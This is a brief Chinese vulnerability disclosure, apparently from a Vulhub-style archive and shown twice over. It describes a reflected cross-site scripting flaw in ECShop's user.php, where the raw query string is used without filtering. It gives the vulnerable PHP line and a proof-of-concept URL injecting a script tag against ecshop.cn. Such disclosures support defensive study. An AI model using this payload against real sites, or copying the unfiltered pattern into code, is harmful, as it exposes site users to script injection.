VULHUB ™

### 简要描述： ecshop的跨站漏洞 ### 详细说明： 在ecshop的根目录下的 user.php文件第57行中,未对url返回做过滤 如下 ``` $back_act = 'user.php?' . $_SERVER['QUERY_STRING']; ``` 未对$_SERVER['QUERY_STRING'];做过滤 即用户的url框中提交项.以此可插入js或html代码执行 ### 漏洞证明： url如下: ``` http://www.ecshop.cn/user.php?1'"/>1<ScRiPt>prompt(123456789)</ScRiPt> ```

### 简要描述： ecshop的跨站漏洞 ### 详细说明： 在ecshop的根目录下的 user.php文件第57行中,未对url返回做过滤 如下 ``` $back_act = 'user.php?' . $_SERVER['QUERY_STRING']; ``` 未对$_SERVER['QUERY_STRING'];做过滤 即用户的url框中提交项.以此可插入js或html代码执行 ### 漏洞证明： url如下: ``` http://www.ecshop.cn/user.php?1'"/>1<ScRiPt>prompt(123456789)</ScRiPt> ```